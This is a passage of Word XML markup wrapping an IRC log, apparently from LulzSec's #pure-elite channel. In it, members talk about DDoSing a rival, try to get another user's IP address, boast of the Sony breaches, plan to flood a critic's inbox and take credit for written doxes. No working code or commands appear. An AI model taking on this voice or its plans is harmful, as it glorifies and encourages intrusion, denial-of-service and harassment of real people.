          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:28:32 sabu ok troll &lt;3 Jun 04 14:28:35 sabu neuron everythings ok Jun 04 14:28:59 neuron lulzcov = our disinformation campaign?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:29:54 sabu what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:29:57 sabu lulzcov?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:30:03 neuron the other server Jun 04 14:30:29 neuron someone ddos this guy Jun 04 14:30:39 storm i dunno what ips hes using Jun 04 14:30:49 * io (egfaby@HA-umf.f9m.2dndkn.IP) has joined #pure-elite Jun 04 14:30:54 neuron o/ io Jun 04 14:31:00 &lt;io&gt; heya fellow swashbucklers Jun 04 14:31:10 neuron hi io don't think we have ever meet Jun 04 14:32:27 pwnsauce io is an old "one of us" :D Jun 04 14:32:33 &lt;io&gt; maybe not, maybe we did. doesnt matter :) Jun 04 14:32:43 &lt;io&gt; sec brb Jun 04 14:32:44 neuron OOOO Jun 04 14:34:03 storm lol joepie91 Jun 04 14:34:10 storm always on your realname Jun 04 14:34:15 joepie91 don't op me kthx Jun 04 14:34:16 joepie91 ye Jun 04 14:34:16 joepie91 I know Jun 04 14:34:24 storm I'm not opping anyone Jun 04 14:34:25 storm ;p Jun 04 14:34:26 joepie91 I've been lurking on there from anonnews vps since forever Jun 04 14:34:38 joepie91 just decided to join there from normal client as well Jun 04 14:34:56 joepie91 I was joining from the anonnews vps to avoid Ryan ddosing me in a triggerhappy mood Jun 04 14:35:00 joepie91 and indeed Jun 04 14:35:02 joepie91 a few hours later Jun 04 14:35:08 joepie91 "you clever bastard, you know I can't ddos that IP" Jun 04 14:35:15 joepie91 (from Ryan in PM) Jun 04 14:35:50 joepie91 buuuut I don't think Ryan is as triggerhappy right now Jun 04 14:35:51 joepie91 so meh Jun 04 14:36:04 storm | WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) Jun 04 14:36:04 storm ircname : The Prez Jun 04 14:36:04 storm | channels : #lulzsec +##lulzsec Jun 04 14:36:05 storm ROFL Jun 04 14:36:09 storm ##lulzsec Jun 04 14:36:12 neuron lol Jun 04 14:37:00 joepie91 Sabu Jun 04 14:37:06 joepie91 you mentioned an antifa group?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:40:06 sabu what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:40:11 storm pft Jun 04 14:40:12 storm wtf Jun 04 14:40:17 storm JackSparrow's script Jun 04 14:40:17 storm is Jun 04 14:40:18 storm shit Jun 04 14:40:25 &lt;io&gt; lulz Jun 04 14:40:27 neuron lol Jun 04 14:40:30 storm serious Jun 04 14:40:32 storm absolute shit Jun 04 14:40:39 neuron Bwhaha he kicked a mod awesome Jun 04 14:40:47 storm i cant get in cause kayla set +R Jun 04 14:41:06 &lt;io&gt; try now Jun 04 14:41:15 &lt;io&gt; ugh Jun 04 14:41:18 &lt;io&gt; clones back.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:41:28 sabu sigh Jun 04 14:41:43 storm kline them Jun 04 14:42:08 joepie91 sabuthey disrupt national nazi parties Jun 04 14:42:08 joepie91 sabuook at how they fight the ns88 Jun 04 14:42:08 joepie91 tflowwhat did they say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:42:08 joepie91 tflowlolwow Jun 04 14:42:08 joepie91 sabudude Jun 04 14:42:08 joepie91 sabuthey straight up fuck them nazis up hahaha Jun 04 14:43:17 sabu yeah joepie Jun 04 14:43:18 lol i didn't set +R :s Jun 04 14:43:20 sabu that guy Jun 04 14:43:25 storm get me ops back XD Jun 04 14:43:26 sabu part of anti-ns88 movement Jun 04 14:43:34 sabu they got a big anarchy group Jun 04 14:43:37 sabu that fights nazis Jun 04 14:43:56 joepie91 do they have a name?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:44:00 joepie91 like Jun 04 14:44:01 joepie91 group name Jun 04 14:44:15 joepie91 I might be able to ask around a bit and figure out if anyone knows anyting about them and/or their reputation Jun 04 14:44:35 &lt;io&gt; &lt;ryan&gt; /msg botserv badwords #lulzsec add irc.hardchats.com Jun 04 14:44:35 &lt;io&gt; &gt;botserv&lt; badwords #lulzsec add irc.hardchats.com Jun 04 14:44:35 &lt;io&gt; -BotServ- irc.hardchats.com added to #lulzsec bad words list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:44:35 &lt;io&gt; &lt;buccaneer&gt; done, thx Jun 04 14:44:35 &lt;io&gt; &lt;ryan&gt; i turned dontkickops on too so voodoo wont get kicked again Jun 04 14:45:33 storm thanks Jun 04 14:45:36 storm :D Jun 04 14:45:47 sabu ryan doesnt know any of you are involved Jun 04 14:45:48 storm it won't work till I'm opped though &gt;;x Jun 04 14:46:09 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 14:46:32 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 14:47:18 &lt;io&gt; Sabu, didn't talk to him any further and won't. Jun 04 14:47:54 storm we need a v6 server Jun 04 14:47:57 storm fosho Jun 04 14:48:20 storm | WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) Jun 04 14:48:25 storm someone gimme his ip Jun 04 14:48:26 storm lmao Jun 04 14:48:33 storm ill piss him off by taking his nick Jun 04 14:53:44 * Topiary (t@HA-iag.hpg.3uomjh.IP) has joined #pure-elite Jun 04 14:53:55 neuron brb Jun 04 14:53:57 * neuron has quit (Quit: leaving) Jun 04 14:56:45 storm anyone?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:57:41 joepie91 eh Jun 04 14:57:44 joepie91 how should we give his IP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:58:32 storm opers Jun 04 14:58:36 storm should see ips Jun 04 14:58:50 * neuron (neuron@HA-cm6.345.a84vd3.IP) has joined #pure- elite Jun 04 14:58:59 neuron back o/ Jun 04 15:01:13 joepie91 who... are an oper on ED IRC?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:03:17 joepie91 also, Topiary: http://twitter.com/#!/AnotherBrony/status/77049413146648577 Jun 04 15:10:00 lol please guys, dont open anything these people on #lulzsec give you, more than likely it has a 0day in it to own you Jun 04 15:10:08 lol these people are giving you things for a reason Jun 04 15:10:58 neuron Aye :p like that rar i got containing.. a .xls , .ppt, .doc, pdf...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:11:00 neuron XD Jun 04 15:11:13 neuron all useless info Jun 04 15:11:35 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:11:59 lol neuron did you open it on a VM?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:12:36 storm gtg guys Jun 04 15:12:38 storm ill bbl Jun 04 15:12:42 lol bye storm &lt;3 :) Jun 04 15:12:43 storm someone gimme woofs ip Jun 04 15:12:43 joepie91 http://jadedsecurity.net/2011/06/04/who-is-to- blame-for-the-success-of-the-latest-round-of-attacks/ Jun 04 15:12:45 storm &lt;3 :D Jun 04 15:13:09 joepie91 also, best way is still to have a completely isolated machine Jun 04 15:13:17 joepie91 with the actual network cable unplugged Jun 04 15:13:23 joepie91 to open your shit on Jun 04 15:13:28 joepie91 can't break out of a physical machine :D Jun 04 15:14:02 neuron vm :P cause you can nuke it Jun 04 15:18:09 joepie91 vm inside physical machine Jun 04 15:18:16 joepie91 reinstall OS on physical machine Jun 04 15:18:24 joepie91 to "nuke" it :P Jun 04 15:18:33 joepie91 anyhow, read that article Jun 04 15:22:43 joepie91 "Slashdot has so many gurus meditating, the entire damn datacenter had better be levitating a mile off the ground." Jun 04 15:33:40 neuron \o/ we have a $10,000 Bounty http://www.youtube.com/watch?v=RcsJW7Ah-Ho Jun 04 15:34:00 neuron Apperently im a piece of crap... XD Jun 04 15:34:19 pwnsauce :D Jun 04 15:34:22 pwnsauce LOL Jun 04 15:34:29 neuron watch it lol Jun 04 15:34:34 neuron we should flood his inbox for the lulz Jun 04 15:36:03 pwnsauce will do Jun 04 15:36:09 pwnsauce once I free soe band width Jun 04 15:36:13 neuron :D Jun 04 15:36:14 pwnsauce you know what my connections like Jun 04 15:36:21 neuron lol you can use my shell :P Jun 04 15:36:51 joepie91 lol he mad Jun 04 15:36:58 joepie91 he so mad Jun 04 15:37:18 neuron Sabu: Watch that video Jun 04 15:37:47 sabu I did Jun 04 15:38:22 pwnsauce lulz Jun 04 15:38:56 joepie91 lol just wow Jun 04 15:39:09 joepie91 sony fanboys putting a bounty on lulzsec... Jun 04 15:39:11 neuron lol How many voice interview was Topiary involved in :p every time i watch a new interview its tops voice haha Jun 04 15:39:57 Topiary blame Westboro Batshit Church Jun 04 15:40:23 neuron http://www.youtube.com/watch?v=0UmdcNqZmw8 &lt;&lt; Jun 04 15:42:12 joepie91 did kevin mitnick Jun 04 15:42:13 joepie91 just tweet Jun 04 15:42:15 Topiary my shit was about to get raped so hard via DDoS and I didn't want to spend 3 minutes getting back in, so I quickly switched VPNs Jun 04 15:42:16 joepie91 the dox Jun 04 15:42:18 Topiary @ that interview Jun 04 15:42:24 tflow yes Jun 04 15:42:27 tflow he's a tool Jun 04 15:42:27 joepie91 lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 15:42:43 tflow i can't believe they would believe an fbi-informant would hack the bi Jun 04 15:42:45 tflow fbi* Jun 04 15:42:47 neuron lol Topiary how many interviews did you do :P i like to hear them question you Jun 04 15:42:59 Topiary just that one and the other one really Jun 04 15:43:12 joepie91 also what is lulzsec.net Jun 04 15:43:51 tflow no idea, it looks like ryan's doing Jun 04 15:43:53 * neuron claps Jun 04 15:44:09 tflow he also registered lulzsec.org Jun 04 15:45:52 neuron lol this is the first time i saw the leaked dox Jun 04 15:46:22 Topiary kayla and I wrote it Jun 04 15:46:24 Topiary pretty good huh Jun 04 15:46:57 neuron Yeah i like them. Kevin mitnick retwitt makes it even better Jun 04 15:47:28 &lt;io&gt; oh they're from us? thought someone was really that moronic heh Jun 04 15:48:00 * joepie91 checks whois for lulzsec.org/net Jun 04 15:53:18 tflow but yeah Jun 04 15:53:26 tflow no way i#m trusting ryan with any domain Jun 04 15:53:31 tflow after what he did to anonops Jun 04 15:53:35 tflow domains Jun 04 15:53:35 pwnsauce aye Jun 04 15:56:09 neuron what did he do? *i was never in the anonops loop* Jun 04 15:56:28 joepie91 jacked anonops domains Jun 04 15:56:32 joepie91 ddosed the network Jun 04 15:56:36 joepie91 basically hostile takeover Jun 04 15:56:41 joepie91 followed by trying to fuck it up Jun 04 15:56:53 joepie91 but on another note, I should write a fucking script that allows everyone "10 PM credits a day" Jun 04 15:56:57 joepie91 every time you send me a PM you lose one Jun 04 15:57:00 joepie91 after 10 PMs you get ignored Jun 04 15:57:07 neuron lmfao Jun 04 15:57:11 joepie91 maybe that fixes the people typing 1 word per line in PM Jun 04 15:57:22 joepie91 and people that start complete random offtopic conversations while uploading a press release Jun 04 15:57:24 joepie91 and I'm like Jun 04 15:57:25 joepie91 DUDE Jun 04 15:57:27 joepie91 SHUT UP Jun 04 15:57:30 joepie91 I AM TRYING TO GET WORK DONE Jun 04 15:57:44 joepie91 like, just ask your question or state your problem, wait for me to answer, cut all the bullshit and get to the point Jun 04 15:57:45 joepie91 -_- Jun 04 15:58:58 tflow https://support.cloudflare.com/discussions/general- chit-chat/37-cloudflare-protect-bad-guys-websites Jun 04 15:59:02 tflow check that out Jun 04 15:59:02 tflow rofl Jun 04 16:00:06 neuron thats awesome Jun 04 16:00:33 tflow 'CloudFlare does not censor content online, but we do comply with law enforcement agencies as appropriate.' Jun 04 16:00:40 tflow i guess that means handing over ips and stuff Jun 04 16:00:44 tflow i'm ok with that Jun 04 16:01:00 tflow they can arrest some random brazilian guy with a unsecured router Jun 04 16:01:05 tflow an* Jun 04 16:01:06 &lt;io&gt; :D Jun 04 16:01:18 pwnsauce :D Jun 04 16:01:21 pwnsauce LOL :D Jun 04 16:01:58 sabu lolol Jun 04 16:02:46 joepie91 2 Posted by KillerKoala on June 03, 2011 @ 07:22 PM Jun 04 16:02:47 joepie91 You should contact CloudFlare's support team and complain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:02:48 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:02:58 * joepie91 gets annoyed by moralfags who are too lazy and/or not have balls to do something themselves Jun 04 16:04:58 joepie91 also, lol Jun 04 16:05:00 joepie91 cloudflare is really like Jun 04 16:05:04 joepie91 "ye well, idgaf" Jun 04 16:06:24 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:06:24 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:06:25 tflow http://attrition.org/security/rants/sony_aka_sownage.html Jun 04 16:07:15 pwnsauce attrition &lt;3 Jun 04 16:07:27 joepie91 my god. how can people fail to do something as fucking simple as uploading a press release Jun 04 16:07:28 joepie91 like Jun 04 16:07:30 joepie91 there is a few people Jun 04 16:07:35 joepie91 that magically have some sort of problem Jun 04 16:07:37 joepie91 when adding PRs Jun 04 16:07:39 joepie91 EVERY time Jun 04 16:07:56 &lt;io&gt; "If anyone... ANYONE at all uses the term "advanced persistent threat" in describing the attacks on Sony, please hit them very hard before disregarding them as ignorant charlatans hell-bent on serving their own interests." Jun 04 16:07:57 &lt;io&gt; hahaha Jun 04 16:08:11 joepie91 also, http://pastebin.com/aXLkmNmR Jun 04 16:08:22 neuron Hey guys don't you like our recent advanced persisten attacks on sony ;D Jun 04 16:08:53 tflow yeah, i saw joepie91, we rt'd it Jun 04 16:09:02 tflow "I was Bored and I play the game of the year : "hacker vs Sony"" Jun 04 16:09:04 tflow hilarious Jun 04 16:10:49 &lt;io&gt; yah haha Jun 04 16:11:17 &lt;io&gt; by the timeline score is 2:2 between idahc and lulzsec :p Jun 04 16:11:18 tflow certainly is the best game i've played this year Jun 04 16:12:30 joepie91 lol Jun 04 16:12:32 joepie91 ya Jun 04 16:12:36 Topiary game of the year all years Jun 04 16:12:49 lol nah we done 3 or 4 :D Jun 04 16:12:58 joepie91 like Jun 04 16:12:59 joepie91 honestly Jun 04 16:13:00 &lt;io&gt; yah iu thought here was some stuff missing Jun 04 16:13:03 joepie91 it would be best for sony Jun 04 16:13:03 &lt;io&gt; benelux Jun 04 16:13:03 lol sonypics, sonyjp, sonybmg and another Jun 04 16:13:06 joepie91 to just ditch the entire company Jun 04 16:13:10 joepie91 all their web services Jun 04 16:13:12 joepie91 everything Jun 04 16:13:16 joepie91 and just start over from scratch Jun 04 16:13:17 joepie91 lol Jun 04 16:13:19 &lt;io&gt; working on that, sir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:13:31 &lt;io&gt; maybe we could do that for them?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:13:37 joepie91 lolol Jun 04 16:15:34 * storm has quit (Ping timeout: 121 seconds) Jun 04 16:19:47 joepie91 my god Jun 04 16:19:52 joepie91 I'm going to fucking disallow JPG uploads Jun 04 16:19:53 joepie91 on anonnews Jun 04 16:19:59 joepie91 "yeah but I thought JPG was the best format!" Jun 04 16:20:00 neuron lol why Jun 04 16:20:04 joepie91 because Jun 04 16:20:05 joepie91 all these PRs Jun 04 16:20:07 joepie91 are text Jun 04 16:20:08 joepie91 or vector Jun 04 16:20:13 joepie91 and are fucking full of artifacts Jun 04 16:20:17 joepie91 every time someone submits a jpg Jun 04 16:20:21 trollpoll nice recopilation of sony hacks Jun 04 16:20:27 trollpoll btw hi Jun 04 16:20:36 joepie91 like, honestly Jun 04 16:20:38 joepie91 just fucking use PNG Jun 04 16:20:44 joepie91 it's incredibly small for text and vector Jun 04 16:20:47 joepie91 with no quality loss Jun 04 16:20:49 joepie91 also, hai trollpoll Jun 04 16:21:29 trollpoll lol sonypics, sonyjp, sonybmg and another Jun 04 16:21:35 trollpoll that another is like voldermort Jun 04 16:21:41 trollpoll noone wants to name...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:21:44 joepie91 sony* Jun 04 16:22:55 trollpoll so.. whats up sirs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:23:23 joepie91 lulz Jun 04 16:23:26 joepie91 mainly Jun 04 16:23:28 neuron lol Jun 04 16:23:36 neuron trollpoll: we have a 10k bounty on our heads :) Jun 04 16:23:51 trollpoll wtf?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:09 &lt;io&gt; once we hit 10 million, i consider turning myself in. Jun 04 16:24:28 trollpoll who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:31 trollpoll fbi?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:24:34 &lt;io&gt; some sony fanboy Jun 04 16:24:37 &lt;io&gt; nah lol Jun 04 16:24:39 trollpoll bah Jun 04 16:24:42 &lt;io&gt; trollZ obviously Jun 04 16:24:49 neuron http://www.youtube.com/watch?v=RcsJW7Ah-Ho Jun 04 16:24:54 joepie91 lesigh Jun 04 16:24:56 joepie91 http://blitz.uservoice.com/forums/107109- feedback/suggestions/1897759-play-nice-with-cloudflare Jun 04 16:24:59 * storm (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure- elite Jun 04 16:25:10 neuron lol i say we flood his email with dongs and nyan nyan cat Jun 04 16:25:10 joepie91 in the category of stupid proposals of the day Jun 04 16:25:10 trollpoll i use links2 ... i can see youtube now Jun 04 16:25:18 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has left #pure- elite Jun 04 16:25:21 joepie91 blitz Jun 04 16:25:22 joepie91 pbreit, All requests made by blitz have the X- Powered-By: blitz.io header. Maybe you can talk to the CloudFlare team to see if they use this to ignore the hits and not throttle. You can read more about our automatic headers at: http://docs.blitz.io/sprinting/basics Jun 04 16:25:53 trollpoll hacking from an amd of more or less 10 years... Jun 04 16:27:52 joepie91 trollpoll Jun 04 16:27:56 joepie91 specs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:28:32 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure- elite Jun 04 16:30:44 trollpoll shit, im trying to copy paste an d i can... lol Jun 04 16:30:44 trollpoll xDDD Jun 04 16:30:57 pwnsauce LOL Jun 04 16:31:05 trollpoll AMD-K6(tm)-III Processor Jun 04 16:31:13 trollpoll Mhz 551 Jun 04 16:31:20 pwnsauce I have to hack into my own server cos my sister changed the root password again Jun 04 16:31:51 trollpoll lol Jun 04 16:32:06 trollpoll i won this laptop in a hacking challenge Jun 04 16:32:08 neuron physical access makes it much easier Jun 04 16:32:18 trollpoll well... the rest of the ppl doesnt consider a hacking challenge Jun 04 16:32:27 pwnsauce I have physical, but I want to remote it Jun 04 16:32:28 trollpoll they just challenge...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:32:33 neuron should we push some of our funds to buy trollpoll a new laptop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:32:39 trollpoll lol Jun 04 16:32:47 trollpoll i have 3 Jun 04 16:32:59 pwnsauce :D Jun 04 16:33:04 trollpoll but, all in use XDD Jun 04 16:33:18 trollpoll so, i have tor, i have python...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:24 trollpoll i can use links2 with tor...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:28 trollpoll what more?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:33:41 pwnsauce :D Jun 04 16:35:31 neuron lol Jun 04 16:35:33 neuron trollpoll: vpn man :( Jun 04 16:35:51 trollpoll sure Jun 04 16:36:04 neuron what are we going to call it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:36:27 storm back Jun 04 16:36:30 trollpoll i have to improve my skills on anonymate :) Jun 04 16:36:42 joepie91 just stresstested a server of mine Jun 04 16:36:43 joepie91 it did not liek Jun 04 16:36:44 joepie91 :( Jun 04 16:36:55 neuron trollpoll: do you want a vpn? :P im sure we can get you one Jun 04 16:37:10 joepie91 also Jun 04 16:37:11 trollpoll it will be nice Jun 04 16:37:17 joepie91 I have a pentium 3 laptop Jun 04 16:37:20 joepie91 it has like 1,1GhZ though Jun 04 16:37:22 trollpoll lol Jun 04 16:37:40 trollpoll can you run x on it? :D Jun 04 16:37:56 neuron Sabu: do you have a spare vpn :E trollpoll has none Jun 04 16:38:40 joepie91 trollpoll: I actually run Puppy Linux with IceWM Jun 04 16:38:42 joepie91 it runs very well Jun 04 16:38:44 joepie91 I can Skype Jun 04 16:38:49 joepie91 use Iron (aka Chromium) Jun 04 16:38:52 joepie91 with Flash Jun 04 16:38:53 trollpoll very nice Jun 04 16:38:55 joepie91 including Tinychat Jun 04 16:38:56 joepie91 I have Geany Jun 04 16:39:03 joepie91 a local Hiawatha/PHP/MariaDB stack Jun 04 16:39:10 joepie91 PMusic as media player Jun 04 16:39:15 joepie91 Nettalk as IRC client Jun 04 16:39:22 joepie91 (through WINE) Jun 04 16:39:32 trollpoll wow Jun 04 16:39:32 sabu trollpoll I will give you vpn Jun 04 16:39:38 joepie91 hell, I can even have audio/video conversations with Skype with almost no lagginess Jun 04 16:39:39 joepie91 :P Jun 04 16:39:43 * joepie91 &lt;3 Puppy Linux Jun 04 16:39:49 trollpoll did you tried to use iceweasel?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
